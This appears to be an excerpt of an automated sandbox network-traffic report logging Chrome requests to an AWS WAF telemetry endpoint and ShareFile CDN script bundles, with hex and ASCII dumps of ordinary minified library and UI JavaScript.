                                                                                                                                                                                                                      2024-11-05 19:36:10 UTC5608INData Raw: 69 6f 6e 20 6c 28 65 29 7b 76 61 72 20 74 3b 65 2e 64 6f 6e 65 3f 6f 28 65 2e 76 61 6c 75 65 29 3a 28 74 3d 65 2e 76 61 6c 75 65 2c 74 20 69 6e 73 74 61 6e 63 65 6f 66 20 6e 3f 74 3a 6e 65 77 20 6e 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 28 74 29 7d 29 29 29 2e 74 68 65 6e 28 69 2c 73 29 7d 6c 28 28 72 3d 72 2e 61 70 70 6c 79 28 65 2c 74 7c 7c 5b 5d 29 29 2e 6e 65 78 74 28 29 29 7d 29 29 7d 3b 75 6e 64 65 66 69 6e 65 64 3b 63 6f 6e 73 74 20 6c 74 3d 28 65 2c 74 2c 6e 29 3d 3e 73 74 28 76 6f 69 64 20 30 2c 76 6f 69 64 20 30 2c 76 6f 69 64 20 30 2c 28 66 75 6e 63 74 69 6f 6e 2a 28 29 7b 72 65 74 75 72 6e 20 50 72 6f 6d 69 73 65 2e 61 6c 6c 28 65 2e 6d 61 70 28 28 28 65 2c 72 29 3d 3e 73 74 28 76 6f 69 64 20 30 2c 76 6f 69 64 20 30 2c 76 6f 69 64 20 30
                                                                                                                                                                                                                      Data Ascii: ion l(e){var t;e.done?o(e.value):(t=e.value,t instanceof n?t:new n((function(e){e(t)}))).then(i,s)}l((r=r.apply(e,t||[])).next())}))};undefined;const lt=(e,t,n)=>st(void 0,void 0,void 0,(function*(){return Promise.all(e.map(((e,r)=>st(void 0,void 0,void 0
                                                                                                                                                                                                                      2024-11-05 19:36:10 UTC14368INData Raw: 6e 75 6c 6c 21 3d 3d 28 63 3d 6e 75 6c 6c 3d 3d 68 3f 76 6f 69 64 20 30 3a 68 2e 67 65 6e 65 72 69 63 54 79 70 65 50 61 72 61 6d 73 29 26 26 76 6f 69 64 20 30 21 3d 3d 63 3f 63 3a 5b 5d 29 3b 72 65 74 75 72 6e 20 79 69 65 6c 64 20 48 65 28 67 2e 61 72 67 73 2c 74 2c 6e 29 2c 7b 6e 61 6d 65 3a 66 2c 6c 61 62 65 6c 3a 6e 75 6c 6c 3d 3d 68 3f 76 6f 69 64 20 30 3a 68 2e 6c 61 62 65 6c 2c 64 65 73 63 72 69 70 74 69 6f 6e 3a 6e 75 6c 6c 3d 3d 68 3f 76 6f 69 64 20 30 3a 68 2e 64 65 73 63 72 69 70 74 69 6f 6e 2c 61 6c 65 72 74 73 3a 6e 75 6c 6c 3d 3d 68 3f 76 6f 69 64 20 30 3a 68 2e 61 6c 65 72 74 73 2c 69 63 6f 6e 3a 6e 75 6c 6c 3d 3d 68 3f 76 6f 69 64 20 30 3a 68 2e 69 63 6f 6e 2c 61 72 67 73 43 6f 6c 6c 65 63 74 69 6f 6e 3a 6d 2c 67 65 6e 65 72 69 63 54 79 70
                                                                                                                                                                                                                      Data Ascii: null!==(c=null==h?void 0:h.genericTypeParams)&&void 0!==c?c:[]);return yield He(g.args,t,n),{name:f,label:null==h?void 0:h.label,description:null==h?void 0:h.description,alerts:null==h?void 0:h.alerts,icon:null==h?void 0:h.icon,argsCollection:m,genericTyp
                                                                                                                                                                                                                      2024-11-05 19:36:10 UTC9594INData Raw: 74 63 68 3a 74 2c 73 63 6f 72 65 3a 74 3f 30 3a 31 2c 69 6e 64 69 63 65 73 3a 5b 30 2c 74 68 69 73 2e 70 61 74 74 65 72 6e 2e 6c 65 6e 67 74 68 2d 31 5d 7d 7d 7d 2c 6e 6e 2c 63 6c 61 73 73 20 65 78 74 65 6e 64 73 20 58 74 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 65 29 7b 73 75 70 65 72 28 65 29 7d 73 74 61 74 69 63 20 67 65 74 20 74 79 70 65 28 29 7b 72 65 74 75 72 6e 22 70 72 65 66 69 78 2d 65 78 61 63 74 22 7d 73 74 61 74 69 63 20 67 65 74 20 6d 75 6c 74 69 52 65 67 65 78 28 29 7b 72 65 74 75 72 6e 2f 5e 5c 5e 22 28 2e 2a 29 22 24 2f 7d 73 74 61 74 69 63 20 67 65 74 20 73 69 6e 67 6c 65 52 65 67 65 78 28 29 7b 72 65 74 75 72 6e 2f 5e 5c 5e 28 2e 2a 29 24 2f 7d 73 65 61 72 63 68 28 65 29 7b 63 6f 6e 73 74 20 74 3d 65 2e 73 74 61 72 74 73 57 69 74 68 28 74
                                                                                                                                                                                                                      Data Ascii: tch:t,score:t?0:1,indices:[0,this.pattern.length-1]}}},nn,class extends Xt{constructor(e){super(e)}static get type(){return"prefix-exact"}static get multiRegex(){return/^\^"(.*)"$/}static get singleRegex(){return/^\^(.*)$/}search(e){const t=e.startsWith(t


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      43192.168.2.174976618.245.175.1004437144C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-05 19:36:09 UTC407OUTGET /0093b71e39a6/478ed03bbf12/telemetry HTTP/1.1
                                                                                                                                                                                                                      Host: 0093b71e39a6.11de9b12.us-east-1.token.awswaf.com
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                      2024-11-05 19:36:10 UTC448INHTTP/1.1 405 Method Not Allowed
                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Date: Tue, 05 Nov 2024 19:36:09 GMT
                                                                                                                                                                                                                      allow: POST
                                                                                                                                                                                                                      pragma: no-cache
                                                                                                                                                                                                                      expires: 0
                                                                                                                                                                                                                      x-amzn-waf-challenge-id: Root=1-672a73a9-0cbe21d564b8e3c75c15caf9
                                                                                                                                                                                                                      X-Cache: Error from cloudfront
                                                                                                                                                                                                                      Via: 1.1 cf7bc36698f5566034ac1c64e9e7c936.cloudfront.net (CloudFront)
                                                                                                                                                                                                                      X-Amz-Cf-Pop: CDG55-P1
                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                      X-Amz-Cf-Id: kdwO8rdQQRcIhE6z4PV3dAQFroMHJJrfquagT8jZartF5DJSouJQbw==


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      44192.168.2.174976413.227.219.304437144C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-05 19:36:09 UTC606OUTGET /sharefile-web/sharefiledev-templates-pilet/0.110.3/package/dist/index.js HTTP/1.1
                                                                                                                                                                                                                      Host: piletfeed-cdn.sharefile.io
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                      Origin: https://averellharriman.sharefile.com
                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                      Sec-Fetch-Dest: script
                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                      2024-11-05 19:36:10 UTC590INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Content-Type: application/x-javascript
                                                                                                                                                                                                                      Content-Length: 694747
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Last-Modified: Wed, 23 Oct 2024 02:50:55 GMT
                                                                                                                                                                                                                      x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      Server: AmazonS3
                                                                                                                                                                                                                      Date: Tue, 05 Nov 2024 19:36:11 GMT
                                                                                                                                                                                                                      ETag: "30f6ff4cc9b4cb4a5fc2ba1c682cce69"
                                                                                                                                                                                                                      X-Cache: RefreshHit from cloudfront
                                                                                                                                                                                                                      Via: 1.1 80826ca6c4fd6005aeacf5a03c8d42e8.cloudfront.net (CloudFront)
                                                                                                                                                                                                                      X-Amz-Cf-Pop: AMS54-C1
                                                                                                                                                                                                                      X-Amz-Cf-Id: agkiRGmAWCq45MkME2Upbf3Y4cOKSb6Vu32p3El-NJw3BTNsoEemAA==
                                                                                                                                                                                                                      Access-Control-Allow-Origin: https://averellharriman.sharefile.com
                                                                                                                                                                                                                      Vary: Origin
                                                                                                                                                                                                                      2024-11-05 19:36:10 UTC16384INData Raw: 2f 2f 40 70 69 6c 65 74 20 76 3a 32 28 77 65 62 70 61 63 6b 43 68 75 6e 6b 70 72 5f 73 68 61 72 65 66 69 6c 65 64 65 76 74 65 6d 70 6c 61 74 65 73 70 69 6c 65 74 2c 7b 7d 29 0a 53 79 73 74 65 6d 2e 72 65 67 69 73 74 65 72 28 5b 22 40 63 69 74 72 69 74 65 2f 73 66 2d 61 70 69 22 2c 22 40 73 68 61 72 65 66 69 6c 65 64 65 76 2f 61 6e 74 64 2d 63 6f 6e 66 69 67 22 2c 22 61 6e 74 64 22 2c 22 72 65 61 63 74 22 2c 22 72 65 61 63 74 2d 64 6f 6d 22 2c 22 72 65 61 63 74 2d 72 6f 75 74 65 72 22 2c 22 72 65 61 63 74 2d 72 6f 75 74 65 72 2d 64 6f 6d 22 2c 22 74 73 6c 69 62 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 7b 7d 2c 72 3d 7b 7d 2c 61 3d 7b 7d 2c 69 3d 7b 7d 2c 73 3d 7b 7d 2c 6f 3d 7b 7d 2c 6c 3d 7b 7d 2c 75 3d 7b 7d 3b 72 65 74 75
                                                                                                                                                                                                                      Data Ascii: //@pilet v:2(webpackChunkpr_sharefiledevtemplatespilet,{})System.register(["@citrite/sf-api","@sharefiledev/antd-config","antd","react","react-dom","react-router","react-router-dom","tslib"],(function(e,t){var n={},r={},a={},i={},s={},o={},l={},u={};retu
                                                                                                                                                                                                                      2024-11-05 19:36:10 UTC16384INData Raw: 7c 65 2e 73 70 65 65 64 79 2c 74 68 69 73 2e 74 61 67 73 3d 5b 5d 2c 74 68 69 73 2e 63 74 72 3d 30 2c 74 68 69 73 2e 6e 6f 6e 63 65 3d 65 2e 6e 6f 6e 63 65 2c 74 68 69 73 2e 6b 65 79 3d 65 2e 6b 65 79 2c 74 68 69 73 2e 63 6f 6e 74 61 69 6e 65 72 3d 65 2e 63 6f 6e 74 61 69 6e 65 72 2c 74 68 69 73 2e 70 72 65 70 65 6e 64 3d 65 2e 70 72 65 70 65 6e 64 2c 74 68 69 73 2e 69 6e 73 65 72 74 69 6f 6e 50 6f 69 6e 74 3d 65 2e 69 6e 73 65 72 74 69 6f 6e 50 6f 69 6e 74 2c 74 68 69 73 2e 62 65 66 6f 72 65 3d 6e 75 6c 6c 7d 76 61 72 20 74 3d 65 2e 70 72 6f 74 6f 74 79 70 65 3b 72 65 74 75 72 6e 20 74 2e 68 79 64 72 61 74 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 66 6f 72 45 61 63 68 28 74 68 69 73 2e 5f 69 6e 73 65 72 74 54 61 67 29 7d 2c 74 2e 69 6e 73 65 72 74
                                                                                                                                                                                                                      Data Ascii: |e.speedy,this.tags=[],this.ctr=0,this.nonce=e.nonce,this.key=e.key,this.container=e.container,this.prepend=e.prepend,this.insertionPoint=e.insertionPoint,this.before=null}var t=e.prototype;return t.hydrate=function(e){e.forEach(this._insertTag)},t.insert
                                                                                                                                                                                                                      2024-11-05 19:36:10 UTC16384INData Raw: 6e 74 7c 66 6f 6e 74 57 65 69 67 68 74 7c 66 6f 72 6d 61 74 7c 66 72 6f 6d 7c 66 72 7c 66 78 7c 66 79 7c 67 31 7c 67 32 7c 67 6c 79 70 68 4e 61 6d 65 7c 67 6c 79 70 68 4f 72 69 65 6e 74 61 74 69 6f 6e 48 6f 72 69 7a 6f 6e 74 61 6c 7c 67 6c 79 70 68 4f 72 69 65 6e 74 61 74 69 6f 6e 56 65 72 74 69 63 61 6c 7c 67 6c 79 70 68 52 65 66 7c 67 72 61 64 69 65 6e 74 54 72 61 6e 73 66 6f 72 6d 7c 67 72 61 64 69 65 6e 74 55 6e 69 74 73 7c 68 61 6e 67 69 6e 67 7c 68 6f 72 69 7a 41 64 76 58 7c 68 6f 72 69 7a 4f 72 69 67 69 6e 58 7c 69 64 65 6f 67 72 61 70 68 69 63 7c 69 6d 61 67 65 52 65 6e 64 65 72 69 6e 67 7c 69 6e 7c 69 6e 32 7c 69 6e 74 65 72 63 65 70 74 7c 6b 7c 6b 31 7c 6b 32 7c 6b 33 7c 6b 34 7c 6b 65 72 6e 65 6c 4d 61 74 72 69 78 7c 6b 65 72 6e 65 6c 55 6e 69
                                                                                                                                                                                                                      Data Ascii: nt|fontWeight|format|from|fr|fx|fy|g1|g2|glyphName|glyphOrientationHorizontal|glyphOrientationVertical|glyphRef|gradientTransform|gradientUnits|hanging|horizAdvX|horizOriginX|ideographic|imageRendering|in|in2|intercept|k|k1|k2|k3|k4|kernelMatrix|kernelUni
                                                                                                                                                                                                                      2024-11-05 19:36:10 UTC15252INData Raw: 69 6f 6e 20 69 28 65 2c 74 2c 6e 2c 72 2c 69 2c 73 2c 6f 29 7b 72 65 74 75 72 6e 20 61 28 74 26 6e 7c 7e 74 26 72 2c 65 2c 74 2c 69 2c 73 2c 6f 29 7d 66 75 6e 63 74 69 6f 6e 20 73 28 65 2c 74 2c 6e 2c 72 2c 69 2c 73 2c 6f 29 7b 72 65 74 75 72 6e 20 61 28 74 26 72 7c 6e 26 7e 72 2c 65 2c 74 2c 69 2c 73 2c 6f 29 7d 66 75 6e 63 74 69 6f 6e 20 6f 28 65 2c 74 2c 6e 2c 72 2c 69 2c 73 2c 6f 29 7b 72 65 74 75 72 6e 20 61 28 74 5e 6e 5e 72 2c 65 2c 74 2c 69 2c 73 2c 6f 29 7d 66 75 6e 63 74 69 6f 6e 20 6c 28 65 2c 74 2c 6e 2c 72 2c 69 2c 73 2c 6f 29 7b 72 65 74 75 72 6e 20 61 28 6e 5e 28 74 7c 7e 72 29 2c 65 2c 74 2c 69 2c 73 2c 6f 29 7d 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2c 22 5f 5f 65 73 4d 6f 64 75 6c 65 22 2c 7b 76 61 6c 75 65
                                                                                                                                                                                                                      Data Ascii: ion i(e,t,n,r,i,s,o){return a(t&n|~t&r,e,t,i,s,o)}function s(e,t,n,r,i,s,o){return a(t&r|n&~r,e,t,i,s,o)}function o(e,t,n,r,i,s,o){return a(t^n^r,e,t,i,s,o)}function l(e,t,n,r,i,s,o){return a(n^(t|~r),e,t,i,s,o)}Object.defineProperty(t,"__esModule",{value
                                                                                                                                                                                                                      2024-11-05 19:36:10 UTC16384INData Raw: 73 2c 74 2e 6f 70 74 69 6f 6e 73 29 29 72 65 74 75 72 6e 21 31 7d 65 6c 73 65 20 69 66 28 21 76 28 74 2e 71 75 65 72 79 4b 65 79 2c 73 29 29 72 65 74 75 72 6e 21 31 3b 69 66 28 22 61 6c 6c 22 21 3d 3d 6e 29 7b 63 6f 6e 73 74 20 65 3d 74 2e 69 73 41 63 74 69 76 65 28 29 3b 69 66 28 22 61 63 74 69 76 65 22 3d 3d 3d 6e 26 26 21 65 29 72 65 74 75 72 6e 21 31 3b 69 66 28 22 69 6e 61 63 74 69 76 65 22 3d 3d 3d 6e 26 26 65 29 72 65 74 75 72 6e 21 31 7d 72 65 74 75 72 6e 21 28 22 62 6f 6f 6c 65 61 6e 22 3d 3d 74 79 70 65 6f 66 20 6f 26 26 74 2e 69 73 53 74 61 6c 65 28 29 21 3d 3d 6f 7c 7c 76 6f 69 64 20 30 21 3d 3d 61 26 26 61 21 3d 3d 74 2e 73 74 61 74 65 2e 66 65 74 63 68 53 74 61 74 75 73 7c 7c 69 26 26 21 69 28 74 29 29 7d 66 75 6e 63 74 69 6f 6e 20 70 28 65
                                                                                                                                                                                                                      Data Ascii: s,t.options))return!1}else if(!v(t.queryKey,s))return!1;if("all"!==n){const e=t.isActive();if("active"===n&&!e)return!1;if("inactive"===n&&e)return!1}return!("boolean"==typeof o&&t.isStale()!==o||void 0!==a&&a!==t.state.fetchStatus||i&&!i(t))}function p(e
                                                                                                                                                                                                                      2024-11-05 19:36:10 UTC16384INData Raw: 29 7d 29 29 7d 67 65 74 41 6c 6c 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 6d 75 74 61 74 69 6f 6e 73 7d 66 69 6e 64 28 65 29 7b 72 65 74 75 72 6e 20 76 6f 69 64 20 30 3d 3d 3d 65 2e 65 78 61 63 74 26 26 28 65 2e 65 78 61 63 74 3d 21 30 29 2c 74 68 69 73 2e 6d 75 74 61 74 69 6f 6e 73 2e 66 69 6e 64 28 28 74 3d 3e 70 28 65 2c 74 29 29 29 7d 66 69 6e 64 41 6c 6c 28 65 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 6d 75 74 61 74 69 6f 6e 73 2e 66 69 6c 74 65 72 28 28 74 3d 3e 70 28 65 2c 74 29 29 29 7d 6e 6f 74 69 66 79 28 65 29 7b 46 2e 62 61 74 63 68 28 28 28 29 3d 3e 7b 74 68 69 73 2e 6c 69 73 74 65 6e 65 72 73 2e 66 6f 72 45 61 63 68 28 28 74 3d 3e 7b 74 28 65 29 7d 29 29 7d 29 29 7d 72 65 73 75 6d 65 50 61 75 73 65 64 4d 75 74 61 74 69 6f 6e 73 28 29 7b
                                                                                                                                                                                                                      Data Ascii: )}))}getAll(){return this.mutations}find(e){return void 0===e.exact&&(e.exact=!0),this.mutations.find((t=>p(e,t)))}findAll(e){return this.mutations.filter((t=>p(e,t)))}notify(e){F.batch((()=>{this.listeners.forEach((t=>{t(e)}))}))}resumePausedMutations(){
                                                                                                                                                                                                                      2024-11-05 19:36:10 UTC16384INData Raw: 75 73 65 20 51 75 65 72 79 43 6c 69 65 6e 74 50 72 6f 76 69 64 65 72 20 74 6f 20 73 65 74 20 6f 6e 65 22 29 3b 72 65 74 75 72 6e 20 74 7d 2c 63 65 3d 61 2e 63 72 65 61 74 65 43 6f 6e 74 65 78 74 28 21 31 29 2c 6d 65 3d 28 29 3d 3e 61 2e 75 73 65 43 6f 6e 74 65 78 74 28 63 65 29 2c 5f 65 3d 63 65 2e 50 72 6f 76 69 64 65 72 3b 66 75 6e 63 74 69 6f 6e 20 68 65 28 29 7b 6c 65 74 20 65 3d 21 31 3b 72 65 74 75 72 6e 7b 63 6c 65 61 72 52 65 73 65 74 3a 28 29 3d 3e 7b 65 3d 21 31 7d 2c 72 65 73 65 74 3a 28 29 3d 3e 7b 65 3d 21 30 7d 2c 69 73 52 65 73 65 74 3a 28 29 3d 3e 65 7d 7d 63 6f 6e 73 74 20 66 65 3d 61 2e 63 72 65 61 74 65 43 6f 6e 74 65 78 74 28 68 65 28 29 29 2c 70 65 3d 28 29 3d 3e 61 2e 75 73 65 43 6f 6e 74 65 78 74 28 66 65 29 3b 66 75 6e 63 74 69 6f
                                                                                                                                                                                                                      Data Ascii: use QueryClientProvider to set one");return t},ce=a.createContext(!1),me=()=>a.useContext(ce),_e=ce.Provider;function he(){let e=!1;return{clearReset:()=>{e=!1},reset:()=>{e=!0},isReset:()=>e}}const fe=a.createContext(he()),pe=()=>a.useContext(fe);functio
                                                                                                                                                                                                                      2024-11-05 19:36:10 UTC16384INData Raw: 72 2e 66 6f 72 45 61 63 68 28 74 68 69 73 2e 68 61 6e 64 6c 65 72 73 2c 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 6e 75 6c 6c 21 3d 3d 74 26 26 65 28 74 29 7d 29 29 7d 2c 65 2e 65 78 70 6f 72 74 73 3d 61 7d 2c 34 30 39 37 3a 28 65 2c 74 2c 6e 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 72 3d 6e 28 31 37 39 33 29 2c 61 3d 6e 28 37 33 30 33 29 3b 65 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 65 26 26 21 72 28 74 29 3f 61 28 65 2c 74 29 3a 74 7d 7d 2c 33 35 37 32 3a 28 65 2c 74 2c 6e 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 72 3d 6e 28 34 38 36 37 29 2c 61 3d 6e 28 38 35 32 37 29 2c 69 3d 6e 28 36 35 30 32 29 2c 73 3d 6e 28 35 35 34 36 29 2c 6f 3d 6e 28 36 34 34 29 3b 66 75
                                                                                                                                                                                                                      Data Ascii: r.forEach(this.handlers,(function(t){null!==t&&e(t)}))},e.exports=a},4097:(e,t,n)=>{"use strict";var r=n(1793),a=n(7303);e.exports=function(e,t){return e&&!r(t)?a(e,t):t}},3572:(e,t,n)=>{"use strict";var r=n(4867),a=n(8527),i=n(6502),s=n(5546),o=n(644);fu
                                                                                                                                                                                                                      2024-11-05 19:36:10 UTC16384INData Raw: 65 72 6c 69 6d 69 74 3a 22 31 30 22 7d 2c 76 6f 69 64 20 30 29 2c 28 30 2c 72 2e 74 5a 29 28 22 70 61 74 68 22 2c 7b 64 3a 22 4d 32 31 20 33 32 2e 35 48 37 33 22 2c 73 74 72 6f 6b 65 3a 22 62 6c 61 63 6b 22 2c 73 74 72 6f 6b 65 57 69 64 74 68 3a 22 32 22 2c 73 74 72 6f 6b 65 4d 69 74 65 72 6c 69 6d 69 74 3a 22 31 30 22 7d 2c 76 6f 69 64 20 30 29 2c 28 30 2c 72 2e 74 5a 29 28 22 70 61 74 68 22 2c 7b 64 3a 22 4d 32 31 20 33 37 2e 35 48 37 33 22 2c 73 74 72 6f 6b 65 3a 22 62 6c 61 63 6b 22 2c 73 74 72 6f 6b 65 57 69 64 74 68 3a 22 32 22 2c 73 74 72 6f 6b 65 4d 69 74 65 72 6c 69 6d 69 74 3a 22 31 30 22 7d 2c 76 6f 69 64 20 30 29 2c 28 30 2c 72 2e 74 5a 29 28 22 70 61 74 68 22 2c 7b 64 3a 22 4d 32 31 20 31 37 2e 35 48 33 38 22 2c 73 74 72 6f 6b 65 3a 22 62 6c
                                                                                                                                                                                                                      Data Ascii: erlimit:"10"},void 0),(0,r.tZ)("path",{d:"M21 32.5H73",stroke:"black",strokeWidth:"2",strokeMiterlimit:"10"},void 0),(0,r.tZ)("path",{d:"M21 37.5H73",stroke:"black",strokeWidth:"2",strokeMiterlimit:"10"},void 0),(0,r.tZ)("path",{d:"M21 17.5H38",stroke:"bl
                                                                                                                                                                                                                      2024-11-05 19:36:10 UTC16384INData Raw: 6c 73 65 22 72 65 74 75 72 6e 22 3d 3d 3d 6e 2e 6d 65 74 68 6f 64 26 26 6e 2e 61 62 72 75 70 74 28 22 72 65 74 75 72 6e 22 2c 6e 2e 61 72 67 29 3b 72 3d 22 65 78 65 63 75 74 69 6e 67 22 3b 76 61 72 20 6c 3d 6d 28 65 2c 74 2c 6e 29 3b 69 66 28 22 6e 6f 72 6d 61 6c 22 3d 3d 3d 6c 2e 74 79 70 65 29 7b 69 66 28 72 3d 6e 2e 64 6f 6e 65 3f 22 63 6f 6d 70 6c 65 74 65 64 22 3a 22 73 75 73 70 65 6e 64 65 64 59 69 65 6c 64 22 2c 6c 2e 61 72 67 3d 3d 3d 5f 29 63 6f 6e 74 69 6e 75 65 3b 72 65 74 75 72 6e 7b 76 61 6c 75 65 3a 6c 2e 61 72 67 2c 64 6f 6e 65 3a 6e 2e 64 6f 6e 65 7d 7d 22 74 68 72 6f 77 22 3d 3d 3d 6c 2e 74 79 70 65 26 26 28 72 3d 22 63 6f 6d 70 6c 65 74 65 64 22 2c 6e 2e 6d 65 74 68 6f 64 3d 22 74 68 72 6f 77 22 2c 6e 2e 61 72 67 3d 6c 2e 61 72 67 29 7d
                                                                                                                                                                                                                      Data Ascii: lse"return"===n.method&&n.abrupt("return",n.arg);r="executing";var l=m(e,t,n);if("normal"===l.type){if(r=n.done?"completed":"suspendedYield",l.arg===_)continue;return{value:l.arg,done:n.done}}"throw"===l.type&&(r="completed",n.method="throw",n.arg=l.arg)}


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      45192.168.2.174976513.227.219.304437144C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-05 19:36:09 UTC611OUTGET /sharefile-web/sharefiledev-threatalert-mgt-pilet/1.14.0/package/dist/index.js HTTP/1.1
                                                                                                                                                                                                                      Host: piletfeed-cdn.sharefile.io
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                      Origin: https://averellharriman.sharefile.com
                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                      Sec-Fetch-Dest: script
                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                      2024-11-05 19:36:10 UTC590INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Content-Type: application/x-javascript
                                                                                                                                                                                                                      Content-Length: 904512
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Last-Modified: Tue, 05 Mar 2024 06:32:15 GMT
                                                                                                                                                                                                                      x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      Server: AmazonS3
                                                                                                                                                                                                                      Date: Tue, 05 Nov 2024 19:36:11 GMT
                                                                                                                                                                                                                      ETag: "4bca71b5e96ba1017d2f126850c99835"
                                                                                                                                                                                                                      X-Cache: RefreshHit from cloudfront
                                                                                                                                                                                                                      Via: 1.1 23776effa8a63b2e2dccd702e73b0c86.cloudfront.net (CloudFront)
                                                                                                                                                                                                                      X-Amz-Cf-Pop: AMS54-C1
                                                                                                                                                                                                                      X-Amz-Cf-Id: tpTzTz6i6gFga_haZrcb_leWqG8i5Odzb8cAlSfMGchpVVp-8uROzg==
                                                                                                                                                                                                                      Access-Control-Allow-Origin: https://averellharriman.sharefile.com
                                                                                                                                                                                                                      Vary: Origin
                                                                                                                                                                                                                      2024-11-05 19:36:10 UTC15794INData Raw: 2f 2f 40 70 69 6c 65 74 20 76 3a 32 28 77 65 62 70 61 63 6b 43 68 75 6e 6b 70 72 5f 73 68 61 72 65 66 69 6c 65 64 65 76 74 68 72 65 61 74 61 6c 65 72 74 6d 67 74 70 69 6c 65 74 2c 7b 22 40 63 69 74 72 69 74 65 2f 63 69 74 72 69 78 2d 75 69 40 32 35 2e 34 36 2e 30 22 3a 22 63 69 74 72 69 74 65 2d 63 69 74 72 69 78 2d 75 69 2e 6a 73 22 7d 29 0a 53 79 73 74 65 6d 2e 72 65 67 69 73 74 65 72 28 5b 22 72 65 61 63 74 22 2c 22 40 63 69 74 72 69 74 65 2f 63 69 74 72 69 78 2d 75 69 40 32 35 2e 34 36 2e 30 22 2c 22 74 73 6c 69 62 22 2c 22 72 65 61 63 74 2d 64 6f 6d 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 7b 7d 2c 72 3d 7b 7d 2c 6f 3d 7b 7d 2c 69 3d 7b 7d 3b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72
                                                                                                                                                                                                                      Data Ascii: //@pilet v:2(webpackChunkpr_sharefiledevthreatalertmgtpilet,{"@citrite/citrix-ui@25.46.0":"citrite-citrix-ui.js"})System.register(["react","@citrite/citrix-ui@25.46.0","tslib","react-dom"],(function(e,t){var n={},r={},o={},i={};return Object.defineProper
